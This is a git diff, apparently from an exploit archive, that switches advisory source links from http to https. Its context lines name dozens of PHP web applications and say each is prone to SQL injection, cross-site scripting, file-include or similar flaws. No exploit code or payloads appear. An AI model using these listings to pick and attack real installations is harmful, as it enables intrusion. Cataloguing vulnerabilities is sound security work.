diff --git a/exploits/php/webapps/27298.txt b/exploits/php/webapps/27298.txt index ff5e27d46..9ad0097b0 100644 --- a/exploits/php/webapps/27298.txt +++ b/exploits/php/webapps/27298.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16789/info +source: https://www.securityfocus.com/bid/16789/info Web Calendar Pro is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27299.txt b/exploits/php/webapps/27299.txt index 2e711c503..4097577cc 100644 --- a/exploits/php/webapps/27299.txt +++ b/exploits/php/webapps/27299.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16793/info +source: https://www.securityfocus.com/bid/16793/info NOCC Webmail is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27300.txt b/exploits/php/webapps/27300.txt index 034325d22..2610684e3 100644 --- a/exploits/php/webapps/27300.txt +++ b/exploits/php/webapps/27300.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16793/info +source: https://www.securityfocus.com/bid/16793/info NOCC Webmail is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27301.txt b/exploits/php/webapps/27301.txt index eccb70770..a7d2ce330 100644 --- a/exploits/php/webapps/27301.txt +++ b/exploits/php/webapps/27301.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16793/info +source: https://www.securityfocus.com/bid/16793/info NOCC Webmail is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27302.txt b/exploits/php/webapps/27302.txt index f935a3a4c..e35ab3c3a 100644 --- a/exploits/php/webapps/27302.txt +++ b/exploits/php/webapps/27302.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16793/info +source: https://www.securityfocus.com/bid/16793/info NOCC Webmail is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27303.txt b/exploits/php/webapps/27303.txt index 0750e9d37..442a360e8 100644 --- a/exploits/php/webapps/27303.txt +++ b/exploits/php/webapps/27303.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16794/info +source: https://www.securityfocus.com/bid/16794/info Oi! Email Marketing System is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27304.html b/exploits/php/webapps/27304.html index 274964790..8ce58df74 100644 --- a/exploits/php/webapps/27304.html +++ b/exploits/php/webapps/27304.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16796/info +source: https://www.securityfocus.com/bid/16796/info CubeCart is prone to an arbitrary file-upload vulnerability. diff --git a/exploits/php/webapps/27305.txt b/exploits/php/webapps/27305.txt index 4ea731226..654e65b22 100644 --- a/exploits/php/webapps/27305.txt +++ b/exploits/php/webapps/27305.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16799/info +source: https://www.securityfocus.com/bid/16799/info PHPX is prone to an HTML-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27306.txt b/exploits/php/webapps/27306.txt index 0fd5ac1ac..7c7ac6b51 100644 --- a/exploits/php/webapps/27306.txt +++ b/exploits/php/webapps/27306.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16810/info +source: https://www.securityfocus.com/bid/16810/info JGS-Gallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27307.txt b/exploits/php/webapps/27307.txt index cf43a9895..e21db005d 100644 --- a/exploits/php/webapps/27307.txt +++ b/exploits/php/webapps/27307.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16810/info +source: https://www.securityfocus.com/bid/16810/info JGS-Gallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27308.txt b/exploits/php/webapps/27308.txt index 4eed73c38..3148808ac 100644 --- a/exploits/php/webapps/27308.txt +++ b/exploits/php/webapps/27308.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16815/info +source: https://www.securityfocus.com/bid/16815/info MyPHPNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27309.txt b/exploits/php/webapps/27309.txt index 2ea8120ef..587eed06c 100644 --- a/exploits/php/webapps/27309.txt +++ b/exploits/php/webapps/27309.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16815/info +source: https://www.securityfocus.com/bid/16815/info MyPHPNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27311.txt b/exploits/php/webapps/27311.txt index 73ad63211..316370c66 100644 --- a/exploits/php/webapps/27311.txt +++ b/exploits/php/webapps/27311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16822/info +source: https://www.securityfocus.com/bid/16822/info SPiD is prone to a local file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27312.txt b/exploits/php/webapps/27312.txt index 41f8f2806..cfacf135d 100644 --- a/exploits/php/webapps/27312.txt +++ b/exploits/php/webapps/27312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16823/info +source: https://www.securityfocus.com/bid/16823/info Website generator is prone to an arbitrary file-upload vulnerability. diff --git a/exploits/php/webapps/27313.txt b/exploits/php/webapps/27313.txt index e97395af5..4b68fc204 100644 --- a/exploits/php/webapps/27313.txt +++ b/exploits/php/webapps/27313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16828/info +source: https://www.securityfocus.com/bid/16828/info DCI-Taskeen is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27314.txt b/exploits/php/webapps/27314.txt index e330adebc..5768fdfbe 100644 --- a/exploits/php/webapps/27314.txt +++ b/exploits/php/webapps/27314.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16828/info +source: https://www.securityfocus.com/bid/16828/info DCI-Taskeen is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27318.txt b/exploits/php/webapps/27318.txt index 19c49d193..a9619c37e 100644 --- a/exploits/php/webapps/27318.txt +++ b/exploits/php/webapps/27318.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16831/info +source: https://www.securityfocus.com/bid/16831/info PHP-Nuke is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27321.txt b/exploits/php/webapps/27321.txt index b1848e736..051b33b08 100644 --- a/exploits/php/webapps/27321.txt +++ b/exploits/php/webapps/27321.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16842/info +source: https://www.securityfocus.com/bid/16842/info Fantastic News is prone to an SQL-injection vulnerability. diff --git a/exploits/php/webapps/27322.txt b/exploits/php/webapps/27322.txt index 0248dc06f..417709890 100644 --- a/exploits/php/webapps/27322.txt +++ b/exploits/php/webapps/27322.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16843/info +source: https://www.securityfocus.com/bid/16843/info Woltlab Burning Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27323.txt b/exploits/php/webapps/27323.txt index b282c637e..8ff321858 100644 --- a/exploits/php/webapps/27323.txt +++ b/exploits/php/webapps/27323.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16843/info +source: https://www.securityfocus.com/bid/16843/info Woltlab Burning Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27324.txt b/exploits/php/webapps/27324.txt index fc3aa66e0..07361cff7 100644 --- a/exploits/php/webapps/27324.txt +++ b/exploits/php/webapps/27324.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16848/info +source: https://www.securityfocus.com/bid/16848/info Archangel Weblog is prone to an authentication-bypass vulnerability. This issue is due to a failure in the application to properly validate user-supplied data. diff --git a/exploits/php/webapps/27327.txt b/exploits/php/webapps/27327.txt index 2441ace17..09b6d814c 100644 --- a/exploits/php/webapps/27327.txt +++ b/exploits/php/webapps/27327.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16853/info +source: https://www.securityfocus.com/bid/16853/info D3Jeeb is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27328.txt b/exploits/php/webapps/27328.txt index adc5eba42..167e62628 100644 --- a/exploits/php/webapps/27328.txt +++ b/exploits/php/webapps/27328.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16853/info +source: https://www.securityfocus.com/bid/16853/info D3Jeeb is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27330.txt b/exploits/php/webapps/27330.txt index 8ead9843d..0a764386c 100644 --- a/exploits/php/webapps/27330.txt +++ b/exploits/php/webapps/27330.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16858/info +source: https://www.securityfocus.com/bid/16858/info The 'n8cms' script is prone to multiple input-validation vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27331.txt b/exploits/php/webapps/27331.txt index d69a5d4c2..e29a0dd59 100644 --- a/exploits/php/webapps/27331.txt +++ b/exploits/php/webapps/27331.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16858/info +source: https://www.securityfocus.com/bid/16858/info The 'n8cms' script is prone to multiple input-validation vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27332.txt b/exploits/php/webapps/27332.txt index 194b9ba6f..c26800595 100644 --- a/exploits/php/webapps/27332.txt +++ b/exploits/php/webapps/27332.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16858/info +source: https://www.securityfocus.com/bid/16858/info The 'n8cms' script is prone to multiple input-validation vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27333.txt b/exploits/php/webapps/27333.txt index 235022fe6..44ffeda98 100644 --- a/exploits/php/webapps/27333.txt +++ b/exploits/php/webapps/27333.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16874/info +source: https://www.securityfocus.com/bid/16874/info QwikiWiki is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27336.txt b/exploits/php/webapps/27336.txt index 42cf6e83b..23a0c95ac 100644 --- a/exploits/php/webapps/27336.txt +++ b/exploits/php/webapps/27336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16879/info +source: https://www.securityfocus.com/bid/16879/info EJ3 TOPo is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27337.txt b/exploits/php/webapps/27337.txt index a794dcc83..2dd69a477 100644 --- a/exploits/php/webapps/27337.txt +++ b/exploits/php/webapps/27337.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16881/info +source: https://www.securityfocus.com/bid/16881/info Mozilla Thunderbird is susceptible to multiple remote information-disclosure vulnerabilities. These issues are due to the application's failure to properly enforce the restriction for downloading remote content in email messages. diff --git a/exploits/php/webapps/27338.txt b/exploits/php/webapps/27338.txt index e38f2153c..2d2ecc903 100644 --- a/exploits/php/webapps/27338.txt +++ b/exploits/php/webapps/27338.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16885/info +source: https://www.securityfocus.com/bid/16885/info PEHEPE Membership Management System is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27339.txt b/exploits/php/webapps/27339.txt index fa3ab3f9b..764821dc5 100644 --- a/exploits/php/webapps/27339.txt +++ b/exploits/php/webapps/27339.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16887/info +source: https://www.securityfocus.com/bid/16887/info PEHEPE Membership Management System is prone to a remote PHP code-injection vulnerability. diff --git a/exploits/php/webapps/27340.txt b/exploits/php/webapps/27340.txt index 5064ea444..c701b8e3f 100644 --- a/exploits/php/webapps/27340.txt +++ b/exploits/php/webapps/27340.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16905/info +source: https://www.securityfocus.com/bid/16905/info SMBlog is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27341.txt b/exploits/php/webapps/27341.txt index 69b9ac0df..7f464f92c 100644 --- a/exploits/php/webapps/27341.txt +++ b/exploits/php/webapps/27341.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16909/info +source: https://www.securityfocus.com/bid/16909/info Dawaween is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27342.txt b/exploits/php/webapps/27342.txt index eb5b28549..0c47ff2b1 100644 --- a/exploits/php/webapps/27342.txt +++ b/exploits/php/webapps/27342.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16915/info +source: https://www.securityfocus.com/bid/16915/info PluggedOut Nexus is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27343.txt b/exploits/php/webapps/27343.txt index 7821427eb..16d1e7f96 100644 --- a/exploits/php/webapps/27343.txt +++ b/exploits/php/webapps/27343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16919/info +source: https://www.securityfocus.com/bid/16919/info vBulletin is prone to an HTML-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27344.txt b/exploits/php/webapps/27344.txt index b072ae196..57b5c32f1 100644 --- a/exploits/php/webapps/27344.txt +++ b/exploits/php/webapps/27344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16931/info +source: https://www.securityfocus.com/bid/16931/info NZ Ecommerce is prone to multiple input-validation vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27345.txt b/exploits/php/webapps/27345.txt index 8bce099be..2f53ca629 100644 --- a/exploits/php/webapps/27345.txt +++ b/exploits/php/webapps/27345.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16932/info +source: https://www.securityfocus.com/bid/16932/info LogIT is prone to a remote file-include vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27346.txt b/exploits/php/webapps/27346.txt index 1737e8558..4600c2cf8 100644 --- a/exploits/php/webapps/27346.txt +++ b/exploits/php/webapps/27346.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16955/info +source: https://www.securityfocus.com/bid/16955/info VBZooM Forum is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27347.txt b/exploits/php/webapps/27347.txt index 807d687a6..f737719d1 100644 --- a/exploits/php/webapps/27347.txt +++ b/exploits/php/webapps/27347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16956/info +source: https://www.securityfocus.com/bid/16956/info VBZooM Forum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27348.txt b/exploits/php/webapps/27348.txt index eac5da001..0f04e423e 100644 --- a/exploits/php/webapps/27348.txt +++ b/exploits/php/webapps/27348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16956/info +source: https://www.securityfocus.com/bid/16956/info VBZooM Forum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27354.txt b/exploits/php/webapps/27354.txt index e6bac3bae..05ba377c6 100644 --- a/exploits/php/webapps/27354.txt +++ b/exploits/php/webapps/27354.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16958/info +source: https://www.securityfocus.com/bid/16958/info Easy Forum is prone to an HTML-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27355.txt b/exploits/php/webapps/27355.txt index 88e8f4467..740e8926f 100644 --- a/exploits/php/webapps/27355.txt +++ b/exploits/php/webapps/27355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16959/info +source: https://www.securityfocus.com/bid/16959/info Woltlab Burning Board is prone to a cross-site scripting vulnerability. This issue is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27356.txt b/exploits/php/webapps/27356.txt index 1bd5008f0..a67947647 100644 --- a/exploits/php/webapps/27356.txt +++ b/exploits/php/webapps/27356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16961/info +source: https://www.securityfocus.com/bid/16961/info CuteNews is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content. diff --git a/exploits/php/webapps/27357.txt b/exploits/php/webapps/27357.txt index b85cc3794..3269b772b 100644 --- a/exploits/php/webapps/27357.txt +++ b/exploits/php/webapps/27357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16965/info +source: https://www.securityfocus.com/bid/16965/info Simplog is prone to an information-disclosure vulnerability. The application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27358.txt b/exploits/php/webapps/27358.txt index 89645e084..bf173290a 100644 --- a/exploits/php/webapps/27358.txt +++ b/exploits/php/webapps/27358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16968/info +source: https://www.securityfocus.com/bid/16968/info DVGuestbook is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27359.txt b/exploits/php/webapps/27359.txt index 62165a28a..482624bb5 100644 --- a/exploits/php/webapps/27359.txt +++ b/exploits/php/webapps/27359.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16968/info +source: https://www.securityfocus.com/bid/16968/info DVGuestbook is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27360.txt b/exploits/php/webapps/27360.txt index b2688672a..96ace2dc1 100644 --- a/exploits/php/webapps/27360.txt +++ b/exploits/php/webapps/27360.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16970/info +source: https://www.securityfocus.com/bid/16970/info RunCMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content. diff --git a/exploits/php/webapps/27361.txt b/exploits/php/webapps/27361.txt index 16a7a82b8..42fda41c9 100644 --- a/exploits/php/webapps/27361.txt +++ b/exploits/php/webapps/27361.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16971/info +source: https://www.securityfocus.com/bid/16971/info Invision Power Board is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27362.txt b/exploits/php/webapps/27362.txt index 6df490b97..4a840e3cd 100644 --- a/exploits/php/webapps/27362.txt +++ b/exploits/php/webapps/27362.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16973/info +source: https://www.securityfocus.com/bid/16973/info The bitweaver application is prone to an HTML-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27363.txt b/exploits/php/webapps/27363.txt index 68818bad3..35b2578b5 100644 --- a/exploits/php/webapps/27363.txt +++ b/exploits/php/webapps/27363.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16977/info +source: https://www.securityfocus.com/bid/16977/info The PHORUM application is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27364.txt b/exploits/php/webapps/27364.txt index 19fd1b3b0..aece7305a 100644 --- a/exploits/php/webapps/27364.txt +++ b/exploits/php/webapps/27364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16979/info +source: https://www.securityfocus.com/bid/16979/info Game-Panel is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content. diff --git a/exploits/php/webapps/27367.txt b/exploits/php/webapps/27367.txt index d255801a2..6835d4f58 100644 --- a/exploits/php/webapps/27367.txt +++ b/exploits/php/webapps/27367.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17001/info +source: https://www.securityfocus.com/bid/17001/info Link Bank is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content. diff --git a/exploits/php/webapps/27368.txt b/exploits/php/webapps/27368.txt index 7b8ed21eb..181e18545 100644 --- a/exploits/php/webapps/27368.txt +++ b/exploits/php/webapps/27368.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17023/info +source: https://www.securityfocus.com/bid/17023/info Loudblog is prone to multiple input-validation vulnerabilities: diff --git a/exploits/php/webapps/27369.txt b/exploits/php/webapps/27369.txt index 141b3f105..fde44207e 100644 --- a/exploits/php/webapps/27369.txt +++ b/exploits/php/webapps/27369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17023/info +source: https://www.securityfocus.com/bid/17023/info Loudblog is prone to multiple input-validation vulnerabilities: diff --git a/exploits/php/webapps/27370.txt b/exploits/php/webapps/27370.txt index 17a501da6..3ef0198b5 100644 --- a/exploits/php/webapps/27370.txt +++ b/exploits/php/webapps/27370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17023/info +source: https://www.securityfocus.com/bid/17023/info Loudblog is prone to multiple input-validation vulnerabilities: diff --git a/exploits/php/webapps/27371.txt b/exploits/php/webapps/27371.txt index 0549edbcc..ba594df32 100644 --- a/exploits/php/webapps/27371.txt +++ b/exploits/php/webapps/27371.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17025/info +source: https://www.securityfocus.com/bid/17025/info HitHost is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27372.txt b/exploits/php/webapps/27372.txt index 9bdeafde8..19c33611e 100644 --- a/exploits/php/webapps/27372.txt +++ b/exploits/php/webapps/27372.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17025/info +source: https://www.securityfocus.com/bid/17025/info HitHost is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27373.txt b/exploits/php/webapps/27373.txt index 3b0f7383a..23e2bb9fd 100644 --- a/exploits/php/webapps/27373.txt +++ b/exploits/php/webapps/27373.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17029/info +source: https://www.securityfocus.com/bid/17029/info The 'textfileBB' application is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27374.txt b/exploits/php/webapps/27374.txt index c92349dbc..b1ad29d9b 100644 --- a/exploits/php/webapps/27374.txt +++ b/exploits/php/webapps/27374.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17044/info +source: https://www.securityfocus.com/bid/17044/info sBlog is prone to HTML-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27375.txt b/exploits/php/webapps/27375.txt index 28b76630b..3debf753a 100644 --- a/exploits/php/webapps/27375.txt +++ b/exploits/php/webapps/27375.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17044/info +source: https://www.securityfocus.com/bid/17044/info sBlog is prone to HTML-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27379.txt b/exploits/php/webapps/27379.txt index 20ab1ccd2..7ca99c43b 100644 --- a/exploits/php/webapps/27379.txt +++ b/exploits/php/webapps/27379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17047/info +source: https://www.securityfocus.com/bid/17047/info ADP Forum is prone to an HTML-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27380.txt b/exploits/php/webapps/27380.txt index 129e4c7b9..1b83430e7 100644 --- a/exploits/php/webapps/27380.txt +++ b/exploits/php/webapps/27380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27381.txt b/exploits/php/webapps/27381.txt index 628a933c2..94898ee8f 100644 --- a/exploits/php/webapps/27381.txt +++ b/exploits/php/webapps/27381.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27382.txt b/exploits/php/webapps/27382.txt index da3b07984..5e12cf940 100644 --- a/exploits/php/webapps/27382.txt +++ b/exploits/php/webapps/27382.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27383.txt b/exploits/php/webapps/27383.txt index 987f3d681..3f2ef2b44 100644 --- a/exploits/php/webapps/27383.txt +++ b/exploits/php/webapps/27383.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27384.txt b/exploits/php/webapps/27384.txt index 2649e2328..7ed23e598 100644 --- a/exploits/php/webapps/27384.txt +++ b/exploits/php/webapps/27384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27385.txt b/exploits/php/webapps/27385.txt index 132fb037f..67dfc5a30 100644 --- a/exploits/php/webapps/27385.txt +++ b/exploits/php/webapps/27385.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27386.txt b/exploits/php/webapps/27386.txt index 912cd93ee..20c80449b 100644 --- a/exploits/php/webapps/27386.txt +++ b/exploits/php/webapps/27386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27387.txt b/exploits/php/webapps/27387.txt index 3b43ae51d..08912a13a 100644 --- a/exploits/php/webapps/27387.txt +++ b/exploits/php/webapps/27387.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27388.txt b/exploits/php/webapps/27388.txt index b7b565e52..72fc732b6 100644 --- a/exploits/php/webapps/27388.txt +++ b/exploits/php/webapps/27388.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27389.txt b/exploits/php/webapps/27389.txt index 199191fe0..2d9ef902e 100644 --- a/exploits/php/webapps/27389.txt +++ b/exploits/php/webapps/27389.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27390.txt b/exploits/php/webapps/27390.txt index ccd93fede..e7c39a248 100644 --- a/exploits/php/webapps/27390.txt +++ b/exploits/php/webapps/27390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17050/info +source: https://www.securityfocus.com/bid/17050/info DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27391.txt b/exploits/php/webapps/27391.txt index 